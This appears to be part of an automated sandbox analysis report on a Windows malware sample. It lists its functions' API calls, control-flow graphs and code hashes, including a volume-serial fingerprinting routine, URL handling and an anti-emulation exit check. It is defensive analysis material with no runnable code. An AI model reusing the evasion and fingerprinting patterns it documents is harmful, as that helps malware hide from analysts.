                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID: ERROR
                              • API String ID: 367037083-2861137601
                              • Opcode ID: f83ac76cded8b11a04857530ce0793478316b6009be1c99f6ef925ef1f32bfcb
                              • Instruction ID: 246163145322827929b05b1c67845af40699e30d14cecc88dd524f3a0f05403d
                              • Opcode Fuzzy Hash: f83ac76cded8b11a04857530ce0793478316b6009be1c99f6ef925ef1f32bfcb
                              • Instruction Fuzzy Hash: 0FA24A70A15242DFDB24DF65D988B5ABBF6AF44310B19807DE809EB362DB39DC42CB50
                              Function 007CFFD0 Relevance: 63.1, APIs: 40, Strings: 1, Instructions: 1571stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007D0013
                              • lstrlen.KERNEL32(007DCFEC), ref: 007D00BD
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007D00E1
                              • lstrlen.KERNEL32(007DCFEC), ref: 007D00EC
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007D0110
                              • lstrlen.KERNEL32(007DCFEC), ref: 007D011B
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007D013F
                              • lstrlen.KERNEL32(007DCFEC), ref: 007D015A
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007D0189
                              • lstrlen.KERNEL32(007DCFEC), ref: 007D0194
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007D01C3
                              • lstrlen.KERNEL32(007DCFEC), ref: 007D01CE
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007D0206
                              • lstrlen.KERNEL32(007DCFEC), ref: 007D0250
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007D0288
                              • lstrcpy.KERNEL32(00000000,?), ref: 007D059B
                              • lstrlen.KERNEL32(01444EC0), ref: 007D05AB
                              • lstrcpy.KERNEL32(00000000,?), ref: 007D05D7
                              • lstrcat.KERNEL32(00000000,?), ref: 007D05E3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007D060E
                              • lstrlen.KERNEL32(0145DE10), ref: 007D0625
                              • lstrcpy.KERNEL32(00000000,?), ref: 007D064C
                              • lstrcat.KERNEL32(00000000,?), ref: 007D0658
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007D0681
                              • lstrlen.KERNEL32(01444DC0), ref: 007D0698
                              • lstrcpy.KERNEL32(00000000,?), ref: 007D06C9
                              • lstrcat.KERNEL32(00000000,?), ref: 007D06D5
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007D0706
                              • lstrcpy.KERNEL32(00000000,014589A8), ref: 007D074B
                                • Part of subcall function 007B1530: lstrcpy.KERNEL32(00000000,?), ref: 007B1557
                                • Part of subcall function 007B1530: lstrcpy.KERNEL32(00000000,?), ref: 007B1579
                                • Part of subcall function 007B1530: lstrcpy.KERNEL32(00000000,?), ref: 007B159B
                                • Part of subcall function 007B1530: lstrcpy.KERNEL32(00000000,?), ref: 007B15FF
                              • lstrcpy.KERNEL32(00000000,?), ref: 007D077F
                              • lstrcpy.KERNEL32(00000000,0145DE70), ref: 007D07E7
                              • lstrcpy.KERNEL32(00000000,014589F8), ref: 007D0858
                              • lstrcpy.KERNEL32(00000000,fplugins), ref: 007D08CF
                              • lstrcpy.KERNEL32(00000000,?), ref: 007D0928
                              • lstrcpy.KERNEL32(00000000,01458B08), ref: 007D09F8
                                • Part of subcall function 007B24E0: lstrcpy.KERNEL32(00000000,?), ref: 007B2528
                                • Part of subcall function 007B24E0: lstrcpy.KERNEL32(00000000,?), ref: 007B254E
                                • Part of subcall function 007B24E0: lstrcpy.KERNEL32(00000000,?), ref: 007B2577
                              • lstrcpy.KERNEL32(00000000,01458A98), ref: 007D0ACE
                              • lstrcpy.KERNEL32(00000000,?), ref: 007D0B81
                              • lstrcpy.KERNEL32(00000000,01458A98), ref: 007D0D58
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat
                              • String ID: fplugins
                              • API String ID: 2500673778-38756186
                              • Opcode ID: 31055625510c138967339683d03f4cb56a4d22cf9afd74b530abea0d77edc220
                              • Instruction ID: 69f9ccc9629aa0e35455e304df13661d06ac2446f2a2fc270ffe4c00f5a98777
                              • Opcode Fuzzy Hash: 31055625510c138967339683d03f4cb56a4d22cf9afd74b530abea0d77edc220
                              • Instruction Fuzzy Hash: 74E23A71A05341CFD724DF29C488B5ABBF1BF88314F99856ED48D8B352DB399842CB92
                              Function 007CF2F8 Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 391stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(01445160), ref: 007CF315
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CF3A3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007CF3C7
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007CF47B
                              • lstrcpy.KERNEL32(00000000,01445160), ref: 007CF4BB
                              • lstrcpy.KERNEL32(00000000,01458918), ref: 007CF4EA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007CF59E
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007CF61C
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CF64C
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CF69A
                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 007CF718
                              • lstrlen.KERNEL32(014588D8), ref: 007CF746
                              • lstrcpy.KERNEL32(00000000,014588D8), ref: 007CF771
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007CF793
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CF7E4
                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 007CFA32
                              • lstrlen.KERNEL32(01458858), ref: 007CFA60
                              • lstrcpy.KERNEL32(00000000,01458858), ref: 007CFA8B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007CFAAD
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CFAFE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID: ERROR
                              • API String ID: 367037083-2861137601
                              • Opcode ID: 60fa01d3633b4ead2cb7fb007e49f5279c70506e0d33ece20c2eb15d5ba6394b
                              • Instruction ID: f8c4e94bf70fe7d1d823f30dfaa4f6583dc9b91344d8953b0a4c0ec3c73b6933
                              • Opcode Fuzzy Hash: 60fa01d3633b4ead2cb7fb007e49f5279c70506e0d33ece20c2eb15d5ba6394b
                              • Instruction Fuzzy Hash: 80F12B70A15242CFDB24DF69C988B5AB7E6BF44314B19C1BED8099B362D739DC42CB50
                              Function 007C8CA0 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 176COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2382 7c8ca0-7c8cc4 StrCmpCA 2383 7c8ccd-7c8ce6 2382->2383 2384 7c8cc6-7c8cc7 ExitProcess 2382->2384 2386 7c8cec-7c8cf1 2383->2386 2387 7c8ee2-7c8eef call 7b2a20 2383->2387 2389 7c8cf6-7c8cf9 2386->2389 2391 7c8cff 2389->2391 2392 7c8ec3-7c8edc 2389->2392 2393 7c8dbd-7c8dcb StrCmpCA 2391->2393 2394 7c8ddd-7c8deb StrCmpCA 2391->2394 2395 7c8dfd-7c8e0b StrCmpCA 2391->2395 2396 7c8e1d-7c8e2b StrCmpCA 2391->2396 2397 7c8e3d-7c8e4b StrCmpCA 2391->2397 2398 7c8d5a-7c8d69 lstrlen 2391->2398 2399 7c8e56-7c8e64 StrCmpCA 2391->2399 2400 7c8d30-7c8d3f lstrlen 2391->2400 2401 7c8e6f-7c8e7d StrCmpCA 2391->2401 2402 7c8e88-7c8e9a lstrlen 2391->2402 2403 7c8d84-7c8d92 StrCmpCA 2391->2403 2404 7c8da4-7c8db8 StrCmpCA 2391->2404 2405 7c8d06-7c8d15 lstrlen 2391->2405 2392->2387 2423 7c8cf3 2392->2423 2393->2392 2408 7c8dd1-7c8dd8 2393->2408 2394->2392 2409 7c8df1-7c8df8 2394->2409 2395->2392 2410 7c8e11-7c8e18 2395->2410 2396->2392 2411 7c8e31-7c8e38 2396->2411 2397->2392 2412 7c8e4d-7c8e54 2397->2412 2421 7c8d6b-7c8d70 call 7b2a20 2398->2421 2422 7c8d73-7c8d7f call 7b2930 2398->2422 2399->2392 2415 7c8e66-7c8e6d 2399->2415 2419 7c8d49-7c8d55 call 7b2930 2400->2419 2420 7c8d41-7c8d46 call 7b2a20 2400->2420 2401->2392 2416 7c8e7f-7c8e86 2401->2416 2417 7c8e9c-7c8ea1 call 7b2a20 2402->2417 2418 7c8ea4-7c8eb0 call 7b2930 2402->2418 2403->2392 2407 7c8d98-7c8d9f 2403->2407 2404->2392 2413 7c8d1f-7c8d2b call 7b2930 2405->2413 2414 7c8d17-7c8d1c call 7b2a20 2405->2414 2407->2392 2408->2392 2409->2392 2410->2392 2411->2392 2412->2392 2440 7c8eb3-7c8eb5 2413->2440 2414->2413 2415->2392 2416->2392 2417->2418 2418->2440 2419->2440 2420->2419 2421->2422 2422->2440 2423->2389 2440->2392 2441 7c8eb7-7c8eb9 2440->2441 2441->2392 2442 7c8ebb-7c8ebd lstrcpy 2441->2442 2442->2392
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: 5ba032676d25964216fd1fe7c24dd5afce1495b011f317633f3e1267fc7d13fc
                              • Instruction ID: e276ceb764d37a6bf819bd8ea59349fe1c351797b43a5c89f21bb28f2a17b69b
                              • Opcode Fuzzy Hash: 5ba032676d25964216fd1fe7c24dd5afce1495b011f317633f3e1267fc7d13fc
                              • Instruction Fuzzy Hash: 51516870A19741EBCBA09F76DC88F6B7BF4BB04701B50486DE442D7611DB7CE8429B62
                              Function 007D2740 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2443 7d2740-7d2783 GetWindowsDirectoryA 2444 7d278c-7d27ea GetVolumeInformationA 2443->2444 2445 7d2785 2443->2445 2446 7d27ec-7d27f2 2444->2446 2445->2444 2447 7d2809-7d2820 GetProcessHeap RtlAllocateHeap 2446->2447 2448 7d27f4-7d2807 2446->2448 2449 7d2826-7d2844 wsprintfA 2447->2449 2450 7d2822-7d2824 2447->2450 2448->2446 2451 7d285b-7d2872 call 7d71e0 2449->2451 2450->2451
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 007D277B
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,007C93B6,00000000,00000000,00000000,00000000), ref: 007D27AC
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007D280F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007D2816
                              • wsprintfA.USER32 ref: 007D283B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                              • String ID: :\$C
                              • API String ID: 2572753744-3309953409
                              • Opcode ID: 94d098c2c5f623e057bd8c370ee9124dbfbe3b965c6630fcf1d4f9ac09fcd4cd
                              • Instruction ID: 3130c5dd04443a8b2995503c6bdd13e269fe45551f26f175a6491db16242541f
                              • Opcode Fuzzy Hash: 94d098c2c5f623e057bd8c370ee9124dbfbe3b965c6630fcf1d4f9ac09fcd4cd
                              • Instruction Fuzzy Hash: C2317EB1D08249ABCB14CFB88A859EFFFBCEF58710F10016AE505F7651E6348A418BA1
                              Function 007B4BC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50stringnetworkCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2454 7b4bc0-7b4bce 2455 7b4bd0-7b4bd5 2454->2455 2455->2455 2456 7b4bd7-7b4c48 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call 7b2a20 2455->2456
                              APIs
                              • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 007B4BF7
                              • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007B4C01
                              • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007B4C0B
                              • lstrlen.KERNEL32(?,00000000,?), ref: 007B4C1F
                              • InternetCrackUrlA.WININET(?,00000000), ref: 007B4C27
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ??2@$CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1683549937-4251816714
                              • Opcode ID: 6e46b168c5dc592eff8078df0731702407770603fdc9ef2cd9a15ac34eb6c22e
                              • Instruction ID: e6409c5b03776c7cbc8b16c9dfcfef49ad433c4bc45f53890a5697f0816cd443
                              • Opcode Fuzzy Hash: 6e46b168c5dc592eff8078df0731702407770603fdc9ef2cd9a15ac34eb6c22e
                              • Instruction Fuzzy Hash: 88012D71D01218ABDF10DFA8EC45B9EBBB8EB08320F008566F918E7390DB7459058FD4
                              Function 007B1030 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2459 7b1030-7b1055 GetCurrentProcess VirtualAllocExNuma 2460 7b105e-7b107b VirtualAlloc 2459->2460 2461 7b1057-7b1058 ExitProcess 2459->2461 2462 7b107d-7b1080 2460->2462 2463 7b1082-7b1088 2460->2463 2462->2463 2464 7b108a-7b10ab VirtualFree 2463->2464 2465 7b10b1-7b10b6 2463->2465 2464->2465
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 007B1046
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 007B104D
                              • ExitProcess.KERNEL32 ref: 007B1058
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 007B106C
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 007B10AB
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                              • String ID:
                              • API String ID: 3477276466-0
                              • Opcode ID: 31b5ce8043e60f36519856eab5060e5dfc71133ae2d4ebdfc733bb5550d5e15e
                              • Instruction ID: 389964eb29cdbb08369967642a6c818393c7c74fd1d40d40eb06568b44782599
                              • Opcode Fuzzy Hash: 31b5ce8043e60f36519856eab5060e5dfc71133ae2d4ebdfc733bb5550d5e15e
                              • Instruction Fuzzy Hash: 750149713442447BE7205B656C9DF9B77ACE740B02F604414F704EB2C0D971ED009564
                              Function 007CEE90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2466 7cee90-7ceeb5 call 7b2930 2469 7ceec9-7ceecd call 7b6c40 2466->2469 2470 7ceeb7-7ceebf 2466->2470 2473 7ceed2-7ceee8 StrCmpCA 2469->2473 2470->2469 2471 7ceec1-7ceec3 lstrcpy 2470->2471 2471->2469 2474 7ceeea-7cef02 call 7b2a20 call 7b2930 2473->2474 2475 7cef11-7cef18 call 7b2a20 2473->2475 2484 7cef04-7cef0c 2474->2484 2485 7cef45-7cefa0 call 7b2a20 * 10 2474->2485 2481 7cef20-7cef28 2475->2481 2481->2481 2483 7cef2a-7cef37 call 7b2930 2481->2483 2483->2485 2492 7cef39 2483->2492 2484->2485 2488 7cef0e-7cef0f 2484->2488 2491 7cef3e-7cef3f lstrcpy 2488->2491 2491->2485 2492->2491
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CEEC3
                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 007CEEDE
                              • lstrcpy.KERNEL32(00000000,ERROR), ref: 007CEF3F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
